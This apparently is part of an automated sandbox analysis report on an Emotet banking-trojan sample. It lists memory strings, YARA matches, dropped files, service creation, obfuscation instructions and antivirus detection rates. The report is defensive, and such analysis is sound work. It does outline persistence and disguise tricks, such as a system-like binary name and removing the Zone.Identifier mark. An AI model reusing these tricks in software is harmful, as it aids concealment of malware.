                Source: svchost.exe, 00000011.00000003.311896345.000001ABFB249000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000011.00000003.311880922.000001ABFB263000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000011.00000002.312507428.000001ABFB213000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000011.00000003.311896345.000001ABFB249000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000001.00000002.222966420.0000000002F21000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.221574418.0000000002A54000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.486175909.00000000028A0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.486354323.00000000028E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.486498394.0000000002921000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.221459912.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.GlobCollationHost.exe.2920000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.cK2ClsvtJE.exe.2f20000.1.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02922680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02922680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile created: C:\Windows\SysWOW64\HoloShellRuntime\Jump to behavior
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile created: C:\Windows\SysWOW64\HoloShellRuntime\Jump to behavior
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile deleted: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile deleted: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F286F0
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F28330
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F23CE0
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F23EE0
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F242C9
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F241B7
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F24190
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26860
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F27B30
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A1A28E
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A196CE
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A19ECE
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15E67
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A27669
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15A7E
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A183FE
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A1587E
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15D2E
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15D55
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F286F0
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F28330
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F23CE0
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F23EE0
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F242C9
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F241B7
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F24190
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26860
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F27B30
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A1A28E
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A196CE
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A19ECE
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15E67
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A27669
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15A7E
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A183FE
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A1587E
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15D2E
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A15D55
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_029286F0
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02924190
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_029241B7
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_029242C9
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02923CE0
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02923EE0
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02928330
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02927B30
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02926860
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028AA28E
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A96CE
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A9ECE
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028B7669
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A5E67
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A5A7E
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A83FE
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A587E
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A5D2E
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_028A5D55
                Source: cK2ClsvtJE.exe, 00000001.00000002.223365809.00000000031F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs cK2ClsvtJE.exe
                Source: cK2ClsvtJE.exe, 00000001.00000002.223365809.00000000031F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs cK2ClsvtJE.exe
                Source: cK2ClsvtJE.exe, 00000001.00000002.223438087.0000000003220000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs cK2ClsvtJE.exe
                Source: cK2ClsvtJE.exe, 00000001.00000002.223365809.00000000031F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs cK2ClsvtJE.exe
                Source: cK2ClsvtJE.exe, 00000001.00000002.223365809.00000000031F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs cK2ClsvtJE.exe
                Source: cK2ClsvtJE.exe, 00000001.00000002.223438087.0000000003220000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs cK2ClsvtJE.exe
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: classification engineClassification label: mal80.troj.evad.winEXE@19/13@0/6
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02924FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,FindCloseChangeNotification,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02924FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,FindCloseChangeNotification,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F25390 ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F25390 ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,
                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edbJump to behavior
                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edbJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3396:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3396:120:WilError_01
                Source: cK2ClsvtJE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: cK2ClsvtJE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: cK2ClsvtJE.exeVirustotal: Detection: 60%
                Source: cK2ClsvtJE.exeMetadefender: Detection: 43%
                Source: cK2ClsvtJE.exeReversingLabs: Detection: 72%
                Source: cK2ClsvtJE.exeVirustotal: Detection: 60%
                Source: cK2ClsvtJE.exeMetadefender: Detection: 43%
                Source: cK2ClsvtJE.exeReversingLabs: Detection: 72%
                Source: unknownProcess created: C:\Users\user\Desktop\cK2ClsvtJE.exe 'C:\Users\user\Desktop\cK2ClsvtJE.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeProcess created: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Users\user\Desktop\cK2ClsvtJE.exe 'C:\Users\user\Desktop\cK2ClsvtJE.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeProcess created: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A51030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A51030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F260F0 push ecx; mov dword ptr [esp], 0000A172h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F262D0 push ecx; mov dword ptr [esp], 00001969h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F261D0 push ecx; mov dword ptr [esp], 00004B56h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F261B0 push ecx; mov dword ptr [esp], 000003A6h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F262A0 push ecx; mov dword ptr [esp], 0000BFAAh
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26090 push ecx; mov dword ptr [esp], 0000BAD9h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26180 push ecx; mov dword ptr [esp], 0000D106h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26240 push ecx; mov dword ptr [esp], 00008F23h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26140 push ecx; mov dword ptr [esp], 00004AF2h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26320 push ecx; mov dword ptr [esp], 00009128h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26220 push ecx; mov dword ptr [esp], 00004B50h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17EBE push ecx; mov dword ptr [esp], 00009128h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17E3E push ecx; mov dword ptr [esp], 0000BFAAh
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17E6E push ecx; mov dword ptr [esp], 00001969h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A28B8F push edi; iretd
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A33FD9 push ss; iretd
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17C8E push ecx; mov dword ptr [esp], 0000A172h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A3449C push ebx; iretd
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A3449C push FFFFFF95h; iretd
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17CDE push ecx; mov dword ptr [esp], 00004AF2h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17C2E push ecx; mov dword ptr [esp], 0000BAD9h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17DBE push ecx; mov dword ptr [esp], 00004B50h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17DDE push ecx; mov dword ptr [esp], 00008F23h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17D1E push ecx; mov dword ptr [esp], 0000D106h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17D6E push ecx; mov dword ptr [esp], 00004B56h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17D4E push ecx; mov dword ptr [esp], 000003A6h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F260F0 push ecx; mov dword ptr [esp], 0000A172h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F262D0 push ecx; mov dword ptr [esp], 00001969h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F261D0 push ecx; mov dword ptr [esp], 00004B56h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F261B0 push ecx; mov dword ptr [esp], 000003A6h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F262A0 push ecx; mov dword ptr [esp], 0000BFAAh
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26090 push ecx; mov dword ptr [esp], 0000BAD9h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26180 push ecx; mov dword ptr [esp], 0000D106h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26240 push ecx; mov dword ptr [esp], 00008F23h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26140 push ecx; mov dword ptr [esp], 00004AF2h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26320 push ecx; mov dword ptr [esp], 00009128h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F26220 push ecx; mov dword ptr [esp], 00004B50h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17EBE push ecx; mov dword ptr [esp], 00009128h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17E3E push ecx; mov dword ptr [esp], 0000BFAAh
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17E6E push ecx; mov dword ptr [esp], 00001969h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A28B8F push edi; iretd
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A33FD9 push ss; iretd
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17C8E push ecx; mov dword ptr [esp], 0000A172h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A3449C push ebx; iretd
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A3449C push FFFFFF95h; iretd
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17CDE push ecx; mov dword ptr [esp], 00004AF2h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17C2E push ecx; mov dword ptr [esp], 0000BAD9h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17DBE push ecx; mov dword ptr [esp], 00004B50h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17DDE push ecx; mov dword ptr [esp], 00008F23h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17D1E push ecx; mov dword ptr [esp], 0000D106h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17D6E push ecx; mov dword ptr [esp], 00004B56h
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02A17D4E push ecx; mov dword ptr [esp], 000003A6h
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02926090 push ecx; mov dword ptr [esp], 0000BAD9h
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02926180 push ecx; mov dword ptr [esp], 0000D106h
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_029261B0 push ecx; mov dword ptr [esp], 000003A6h
